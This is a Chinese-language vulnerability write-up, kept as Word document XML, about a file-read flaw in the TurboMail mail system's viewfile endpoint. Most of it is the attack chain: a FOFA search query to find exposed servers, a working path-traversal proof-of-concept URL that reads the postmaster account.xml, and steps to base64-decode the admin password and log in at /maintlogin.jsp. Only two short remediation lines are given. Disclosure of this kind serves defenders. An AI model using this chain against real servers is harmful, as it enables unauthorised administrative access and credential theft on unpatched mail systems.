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广州拓波软件科技有限公司 TurboMail 邮件系统 viewfile 文件读取漏洞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广州拓波软件科技有限公司 TurboMail 邮件系统 viewfile 文件读取漏洞，攻击者可通过此漏洞读取账户密码，从而登录后台进一步利用。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1、fofa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body="maintlogin.jsp" &amp;&amp; body="/mailmain?type=logout"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6855" cy="2212975"/>
            <wp:effectExtent l="0" t="0" r="190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221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部分界面如下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4140" cy="2543175"/>
            <wp:effectExtent l="0" t="0" r="1270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POC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127.0.0.1:8080/viewfile?type=cardpic&amp;mbid=1&amp;msgid=2&amp;logtype=3&amp;view=true&amp;cardid=/accounts/root/postmaster&amp;cardclass=../&amp;filename=/account.xml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3164205"/>
            <wp:effectExtent l="0" t="0" r="3175" b="571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这个洞21年就挖过了，只是还是有部分未修复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082540" cy="312420"/>
            <wp:effectExtent l="0" t="0" r="762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5、进一步利用，密码是base64加密,解密的时候=号后面的数据去掉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3088640"/>
            <wp:effectExtent l="0" t="0" r="14605" b="50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6、该密码是管理用户密码，管理入口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/maintlogin.jsp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2235" cy="2545080"/>
            <wp:effectExtent l="0" t="0" r="14605" b="0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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>解密</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>密码即可登录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83815"/>
            <wp:effectExtent l="0" t="0" r="6350" b="698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升级到安全版本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禁止访问敏感信息页面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DA4231"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DADA4231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E0BE9E36"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E0BE9E3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100920B1"/>
    <w:rsid w:val="181835E7"/>
    <w:rsid w:val="268C6A98"/>
    <w:rsid w:val="2A9211C9"/>
    <w:rsid w:val="393E7C1A"/>
    <w:rsid w:val="3BAB3E99"/>
    <w:rsid w:val="408B214B"/>
    <w:rsid w:val="45A56BF4"/>
    <w:rsid w:val="49AE12F2"/>
    <w:rsid w:val="56293A3C"/>
    <w:rsid w:val="5EBD5EE4"/>
    <w:rsid w:val="6ED208E9"/>
    <w:rsid w:val="7C08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2023-12-20T03:05:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-21T01:25:19Z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F809960957974BA2AF4DC54E9C5F349A_12</vt:lpwstr>
  </property>
</Properties>
</file>